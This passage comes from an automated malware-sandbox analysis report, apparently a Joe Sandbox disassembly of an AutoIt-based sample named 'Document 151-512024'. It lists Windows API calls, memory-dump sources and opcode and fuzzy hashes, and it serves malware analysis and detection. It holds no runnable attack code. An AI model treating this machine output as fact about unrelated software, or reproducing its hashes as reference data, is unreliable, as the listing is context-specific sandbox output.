                                                                                                    • API String ID: 642888154-3368625520
                                                                                                    • Opcode ID: 199c587314361ac42c1d48c48caacebf64573a423262aee2cfb08a0348f05b4e
                                                                                                    • Instruction ID: 1a3d83288db7231f122ed3c0320bda40c787da7ed48293555b56da4f664b5eb1
                                                                                                    • Opcode Fuzzy Hash: 199c587314361ac42c1d48c48caacebf64573a423262aee2cfb08a0348f05b4e
                                                                                                    • Instruction Fuzzy Hash: 7B41D534641641AFDB11CF65CC99BE57BF4FB0A754F1882AAE6284B363CB31A842CB40
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 009AC913
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconLoad
                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                    • API String ID: 2457776203-404129466
                                                                                                    • Opcode ID: 8cede7d259710edc24127d932dc6cfe17303f6f6b6ed66dcdf9cea27072a28fd
                                                                                                    • Instruction ID: 4c2a4e00965367e5df4c5b3013df748d325112cda85248d0962098b000d101fe
                                                                                                    • Opcode Fuzzy Hash: 8cede7d259710edc24127d932dc6cfe17303f6f6b6ed66dcdf9cea27072a28fd
                                                                                                    • Instruction Fuzzy Hash: F2112B7568930ABAE7015B94AC82DAB27DCEF56318B10042EF500AA2C2D7A45E0062E5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 952045576-0
                                                                                                    • Opcode ID: ac10c00ef252f2fe5ac4765905bc6fe8c2943a448cd86fe6c40819c8b53b648a
                                                                                                    • Instruction ID: d1963fe18be2fb648e9b3f5c7a39956859a49343e058cc6d2a9044c021731213
                                                                                                    • Opcode Fuzzy Hash: ac10c00ef252f2fe5ac4765905bc6fe8c2943a448cd86fe6c40819c8b53b648a
                                                                                                    • Instruction Fuzzy Hash: 27419265D1121875DB11EBF4888AACFB7ACAF86710F508462F528E3121FB34E255C7E5
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 0095F953
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 0099F3D1
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 0099F454
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 602db4c9c67f63b0ab722d0ef655fcd3113d82980831112e19be923ca18c7e80
                                                                                                    • Instruction ID: 0e815470e662a1871cfbbdcc84b0c6a62b2f17b05319cb9e41063993c9c37a62
                                                                                                    • Opcode Fuzzy Hash: 602db4c9c67f63b0ab722d0ef655fcd3113d82980831112e19be923ca18c7e80
                                                                                                    • Instruction Fuzzy Hash: 4A414031108E40BACB34CB3ED8BC76ABB99AB563B2F14443DE84792560C63694C8D711
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(00000000), ref: 009D2D1B
                                                                                                    • GetDC.USER32(00000000), ref: 009D2D23
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009D2D2E
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 009D2D3A
                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009D2D76
                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009D2D87
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009D5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 009D2DC2
                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009D2DE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3864802216-0
                                                                                                    • Opcode ID: cc60f82656606e13d7e8cf437001bfe7be7c33eeaa3d6c52f314c95b2d691763
                                                                                                    • Instruction ID: da83df8075a0daa859e26cafe0bd4fc0459dff344a386851455910f80b5d6aeb
                                                                                                    • Opcode Fuzzy Hash: cc60f82656606e13d7e8cf437001bfe7be7c33eeaa3d6c52f314c95b2d691763
                                                                                                    • Instruction Fuzzy Hash: AC319F72296214BFEF114F50CC89FEB3BADEF19711F044056FE089A291C6759C80C7A0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2931989736-0
                                                                                                    • Opcode ID: 2f8aaa55b237fab4f057b4a814edd7cdc259444d311e755bb1312d7dae4547ee
                                                                                                    • Instruction ID: 8a16885b4fdb7ea8d15f9e9cea112af35d815d7712ab92341f9f032e3c86144c
                                                                                                    • Opcode Fuzzy Hash: 2f8aaa55b237fab4f057b4a814edd7cdc259444d311e755bb1312d7dae4547ee
                                                                                                    • Instruction Fuzzy Hash: 1121EB71780A09BBD61856208E93FFB335CAFA2388F498431FD169A781F725ED2081E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                    • API String ID: 0-572801152
                                                                                                    • Opcode ID: 5205f6739490237f655d05689efacd8c00ad9a70964ef2235654782ea1800d74
                                                                                                    • Instruction ID: 86be79370a0bc7718f40092894605e9e5762784c9265c97d75eab89bd8219218
                                                                                                    • Opcode Fuzzy Hash: 5205f6739490237f655d05689efacd8c00ad9a70964ef2235654782ea1800d74
                                                                                                    • Instruction Fuzzy Hash: 9DD18E71E0060A9FDF10CF98C885FAEB7B9BB48344F15856DE915AB281E770ED81CB91
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009815CE
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00981651
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009817FB,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009816E4
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009816FB
                                                                                                      • Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00981777
                                                                                                    • __freea.LIBCMT ref: 009817A2
                                                                                                    • __freea.LIBCMT ref: 009817AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829977744-0
                                                                                                    • Opcode ID: b3d80e15013ab1c8f1613d498b35a0c907fca8e77c7c01388b60ffe7d6226981
                                                                                                    • Instruction ID: cc59b35a1e3fc79edc38fd90a8c5cd64df728229ad2017f58ab3933d1f316609
                                                                                                    • Opcode Fuzzy Hash: b3d80e15013ab1c8f1613d498b35a0c907fca8e77c7c01388b60ffe7d6226981
                                                                                                    • Instruction Fuzzy Hash: 2A91A572E002169ADF20AE74C881EEE7BBD9F49750F184659F806E7341D739DD82CB60
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit
                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                    • API String ID: 2610073882-625585964
                                                                                                    • Opcode ID: 94cb03497bdfca6b06dd2209dded223a6539e31744f9880bc022c78862b54330
                                                                                                    • Instruction ID: 154e7d72279148ebf2317506506355566a12ab94245dbdceac3e6f4a212563d3
                                                                                                    • Opcode Fuzzy Hash: 94cb03497bdfca6b06dd2209dded223a6539e31744f9880bc022c78862b54330
                                                                                                    • Instruction Fuzzy Hash: FC919E71E00219ABDF20CFA5C898FAEBBB8EF86714F10855DF505AB280D7749945CFA1
                                                                                                    APIs
                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 009B125C
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 009B1284
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009B12A8
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B12D8
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B135F
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B13C4
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B1430
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                    • String ID:
                                                                                                    • API String ID: 2550207440-0
                                                                                                    • Opcode ID: 67d642902e3f743adf1bf4fbe2782d286afbabc2d33b66e48d86e0ec174ba057
                                                                                                    • Instruction ID: 660061718b9cfc527423de05bf1684ee07182dea350e295c71e67c1e6352edbc
                                                                                                    • Opcode Fuzzy Hash: 67d642902e3f743adf1bf4fbe2782d286afbabc2d33b66e48d86e0ec174ba057
                                                                                                    • Instruction Fuzzy Hash: CB910471A10219AFDB00DF98C9A4BFEB7B9FF85331F504429E910E72A1D774A941CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    • Opcode ID: 84bb4e0f449c4ccbb843a87080ec1961d5ad925f02200c08ca7cac39d6685e01
                                                                                                    • Instruction ID: eff57ef0f548c848fca1dc2b81088b2a7886c51db3fe80b7736e8bd8617e4b5f
                                                                                                    • Opcode Fuzzy Hash: 84bb4e0f449c4ccbb843a87080ec1961d5ad925f02200c08ca7cac39d6685e01
                                                                                                    • Instruction Fuzzy Hash: BA914571D04219EFDB10CFAAC884AEEBBB8FF88320F148455E915B7251D738A956CB60
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 009C396B
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 009C3A7A
                                                                                                    • _wcslen.LIBCMT ref: 009C3A8A
                                                                                                    • VariantClear.OLEAUT32(?), ref: 009C3C1F
                                                                                                      • Part of subcall function 009B0CDF: VariantInit.OLEAUT32(00000000), ref: 009B0D1F
                                                                                                      • Part of subcall function 009B0CDF: VariantCopy.OLEAUT32(?,?), ref: 009B0D28
                                                                                                      • Part of subcall function 009B0CDF: VariantClear.OLEAUT32(?), ref: 009B0D34
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                    • Opcode ID: 0b6737b391410c1029985b2aeba4b3d74d724366e1d6f91b5e5899d8f7c79f8e
                                                                                                    • Instruction ID: 0f23e8b7ffb159f3c11c6d982d6327c441fc8dce9cc8d32d8944f950e6be6ab5
                                                                                                    • Opcode Fuzzy Hash: 0b6737b391410c1029985b2aeba4b3d74d724366e1d6f91b5e5899d8f7c79f8e
                                                                                                    • Instruction Fuzzy Hash: 35913675A083059FC704DF28C490A6AB7E8FF89314F14896DF8899B351DB31EE45CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?,?,009A035E), ref: 009A002B
                                                                                                      • Part of subcall function 009A000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0046
                                                                                                      • Part of subcall function 009A000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0054
                                                                                                      • Part of subcall function 009A000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?), ref: 009A0064
                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 009C4C51
                                                                                                    • _wcslen.LIBCMT ref: 009C4D59
                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 009C4DCF
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 009C4DDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                    • String ID: NULL Pointer assignment
                                                                                                    • API String ID: 614568839-2785691316
                                                                                                    • Opcode ID: a5bab4f1a6ab141a59818c5168b1da2f1a5ded03c67bc9155b4ec93d22c620b4
                                                                                                    • Instruction ID: db23fae26a8a83d10bd018b445ed43c2d467ba7389c060ee58ea5d472787d406
                                                                                                    • Opcode Fuzzy Hash: a5bab4f1a6ab141a59818c5168b1da2f1a5ded03c67bc9155b4ec93d22c620b4
                                                                                                    • Instruction Fuzzy Hash: 0E910471D00219AFDF14DFA4D891FEEB7B8BF48310F10856AE915A7291DB349A44CFA1
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(?), ref: 009D2183
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 009D21B5
                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009D21DD
                                                                                                    • _wcslen.LIBCMT ref: 009D2213
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 009D224D
                                                                                                    • GetSubMenu.USER32(?,?), ref: 009D225B
                                                                                                      • Part of subcall function 009A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A3A57
                                                                                                      • Part of subcall function 009A3A3D: GetCurrentThreadId.KERNEL32 ref: 009A3A5E
                                                                                                      • Part of subcall function 009A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009A25B3), ref: 009A3A65
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009D22E3
                                                                                                      • Part of subcall function 009AE97B: Sleep.KERNEL32 ref: 009AE9F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4196846111-0
                                                                                                    • Opcode ID: 0d6d0ed22bff32962c743c867147fb83141178ada9f0ffb8f066904167e676a5
                                                                                                    • Instruction ID: f600bcfa780d46ccc6c750c645409c5e623300340011dcac2c49d97b6b7ebacb
                                                                                                    • Opcode Fuzzy Hash: 0d6d0ed22bff32962c743c867147fb83141178ada9f0ffb8f066904167e676a5
                                                                                                    • Instruction Fuzzy Hash: 2C719D75A44205AFCB14DFA4C841AAEB7F5EF98320F14C45AF926AB341D734ED41CB90
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 009AAEF9
                                                                                                    • GetKeyboardState.USER32(?), ref: 009AAF0E
                                                                                                    • SetKeyboardState.USER32(?), ref: 009AAF6F
                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 009AAF9D
                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 009AAFBC
                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 009AAFFD
                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009AB020
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: 59af75484daf80111a89685e1cab803269b43eef23945e2f7d06e1aa85a06f81
                                                                                                    • Instruction ID: 8792e7748a8d30af04be2f8ab4620a0ea8e830c4f274422562f24a88a065f550
                                                                                                    • Opcode Fuzzy Hash: 59af75484daf80111a89685e1cab803269b43eef23945e2f7d06e1aa85a06f81
                                                                                                    • Instruction Fuzzy Hash: 1C51A1A06147D63EFB3642348C45BBABEAD5B07304F08858AE1E9558C3D3D9ECC4D791
                                                                                                    APIs
                                                                                                    • GetParent.USER32(00000000), ref: 009AAD19
                                                                                                    • GetKeyboardState.USER32(?), ref: 009AAD2E
                                                                                                    • SetKeyboardState.USER32(?), ref: 009AAD8F
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009AADBB
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009AADD8
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009AAE17
                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009AAE38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
